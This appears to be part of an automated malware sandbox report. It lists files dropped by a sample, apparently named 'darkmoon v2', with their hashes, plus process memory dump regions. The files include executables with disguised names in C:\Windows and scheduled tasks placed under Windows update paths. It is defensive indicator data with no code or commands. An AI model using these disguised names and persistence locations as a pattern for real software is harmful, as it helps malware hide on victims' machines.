                                                                                                                                                                    Filesize

                                                                                                                                                                    60B

                                                                                                                                                                    MD5

                                                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                    SHA1

                                                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                    SHA256

                                                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                    SHA512

                                                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\darkmoon v2\lib\AyBYMBjlvU.bat.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    442KB

                                                                                                                                                                    MD5

                                                                                                                                                                    04029e121a0cfa5991749937dd22a1d9

                                                                                                                                                                    SHA1

                                                                                                                                                                    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                                                                    SHA256

                                                                                                                                                                    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                                                                    SHA512

                                                                                                                                                                    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                                                                  • C:\Windows\$sxr-cmd.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    283KB

                                                                                                                                                                    MD5

                                                                                                                                                                    8a2122e8162dbef04694b9c3e0b6cdee

                                                                                                                                                                    SHA1

                                                                                                                                                                    f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                                                                                                                                                                    SHA256

                                                                                                                                                                    b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                                                                                                                                                                    SHA512

                                                                                                                                                                    99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                                                                                                                                                                  • C:\Windows\$sxr-mshta.exe
                                                                                                                                                                    Filesize

                                                                                                                                                                    14KB

                                                                                                                                                                    MD5

                                                                                                                                                                    0b4340ed812dc82ce636c00fa5c9bef2

                                                                                                                                                                    SHA1

                                                                                                                                                                    51c97ebe601ef079b16bcd87af827b0be5283d96

                                                                                                                                                                    SHA256

                                                                                                                                                                    dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                                                                                                                                                                    SHA512

                                                                                                                                                                    d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    f313c5b4f95605026428425586317353

                                                                                                                                                                    SHA1

                                                                                                                                                                    06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                                    SHA256

                                                                                                                                                                    129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                                    SHA512

                                                                                                                                                                    b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                                                    SHA1

                                                                                                                                                                    a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                                                    SHA256

                                                                                                                                                                    98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                                                    SHA512

                                                                                                                                                                    1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                                    SHA1

                                                                                                                                                                    63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                                    SHA256

                                                                                                                                                                    727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                                    SHA512

                                                                                                                                                                    f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                                    SHA1

                                                                                                                                                                    5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                                    SHA256

                                                                                                                                                                    55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                                    SHA512

                                                                                                                                                                    5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                                                  • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                                                                    Filesize

                                                                                                                                                                    2KB

                                                                                                                                                                    MD5

                                                                                                                                                                    0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                                    SHA1

                                                                                                                                                                    9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                                    SHA256

                                                                                                                                                                    a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                                    SHA512

                                                                                                                                                                    c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                                  • memory/224-30-0x0000000140000000-0x0000000140004000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    16KB

                                                                                                                                                                  • memory/224-29-0x0000000140000000-0x0000000140004000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    16KB

                                                                                                                                                                  • memory/384-114-0x00007FFBD9BD0000-0x00007FFBD9BE0000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/384-104-0x0000019D97C40000-0x0000019D97C67000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    156KB

                                                                                                                                                                  • memory/616-103-0x000001F4A0E80000-0x000001F4A0EA7000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    156KB

                                                                                                                                                                  • memory/616-99-0x000001F4A0E50000-0x000001F4A0E72000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/616-111-0x00007FFBD9BD0000-0x00007FFBD9BE0000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/684-107-0x00000169CE890000-0x00000169CE8B7000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    156KB

                                                                                                                                                                  • memory/684-125-0x00007FFBD9BD0000-0x00007FFBD9BE0000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    64KB

                                                                                                                                                                  • memory/836-22-0x0000013AC37C0000-0x0000013AC3866000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    664KB

                                                                                                                                                                  • memory/836-20-0x0000013AC2D70000-0x0000013AC37C0000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    10.3MB

                                                                                                                                                                  • memory/836-26-0x00007FFC19B50000-0x00007FFC19D45000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    2.0MB

                                                                                                                                                                  • memory/836-23-0x0000013AC2650000-0x0000013AC26A6000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    344KB

                                                                                                                                                                  • memory/836-24-0x0000013AC3870000-0x0000013AC38C8000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    352KB

                                                                                                                                                                  • memory/836-25-0x0000013AA7EF0000-0x0000013AA7F12000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/836-19-0x00007FFC19A50000-0x00007FFC19B0E000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    760KB

                                                                                                                                                                  • memory/836-18-0x00007FFC19B50000-0x00007FFC19D45000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    2.0MB

                                                                                                                                                                  • memory/836-28-0x0000013AA7F10000-0x0000013AA7F1A000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    40KB

                                                                                                                                                                  • memory/836-17-0x0000013AA7ED0000-0x0000013AA7EF4000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    144KB

                                                                                                                                                                  • memory/836-16-0x0000013AC22E0000-0x0000013AC2302000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    136KB

                                                                                                                                                                  • memory/3204-90-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    128KB

                                                                                                                                                                  • memory/3204-91-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    128KB

                                                                                                                                                                  • memory/3204-94-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    128KB

                                                                                                                                                                  • memory/3204-95-0x0000000001340000-0x000000000135A000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    104KB

                                                                                                                                                                  • memory/3208-97-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    160KB

                                                                                                                                                                  • memory/3208-87-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    160KB

                                                                                                                                                                  • memory/3208-89-0x00007FFC19A50000-0x00007FFC19B0E000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    760KB

                                                                                                                                                                  • memory/3208-88-0x00007FFC19B50000-0x00007FFC19D45000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    2.0MB

                                                                                                                                                                  • memory/3208-86-0x0000000140000000-0x0000000140028000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    160KB

                                                                                                                                                                  • memory/4608-83-0x00007FFC19B50000-0x00007FFC19D45000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    2.0MB

                                                                                                                                                                  • memory/4608-69-0x000002626B7A0000-0x000002626B7F0000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    320KB

                                                                                                                                                                  • memory/4608-85-0x000002626B830000-0x000002626B866000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    216KB

                                                                                                                                                                  • memory/4608-84-0x00007FFC19A50000-0x00007FFC19B0E000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    760KB

                                                                                                                                                                  • memory/4608-55-0x00007FFC19B50000-0x00007FFC19D45000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    2.0MB

                                                                                                                                                                  • memory/4608-82-0x000002626B750000-0x000002626B79E000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    312KB

                                                                                                                                                                  • memory/4608-81-0x000002626B7F0000-0x000002626B82C000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    240KB

                                                                                                                                                                  • memory/4608-71-0x000002626BC20000-0x000002626BDE2000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    1.8MB

                                                                                                                                                                  • memory/4608-70-0x000002626B8B0000-0x000002626B962000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    712KB

                                                                                                                                                                  • memory/4608-56-0x00007FFC19A50000-0x00007FFC19B0E000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    760KB

                                                                                                                                                                  • memory/4608-61-0x00007FFC19B50000-0x00007FFC19D45000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    2.0MB

                                                                                                                                                                  • memory/4608-60-0x0000026273AB0000-0x0000026273B62000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    712KB

                                                                                                                                                                  • memory/4608-59-0x0000026273670000-0x0000026273AAE000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    4.2MB

                                                                                                                                                                  • memory/4608-58-0x0000026272EA0000-0x000002627366A000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    7.8MB

                                                                                                                                                                  • memory/4608-57-0x000002626A840000-0x000002626ADC6000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    5.5MB

                                                                                                                                                                  • memory/5040-31-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    24KB

                                                                                                                                                                  • memory/5040-32-0x0000000000400000-0x0000000000406000-memory.dmp
                                                                                                                                                                    Filesize

                                                                                                                                                                    24KB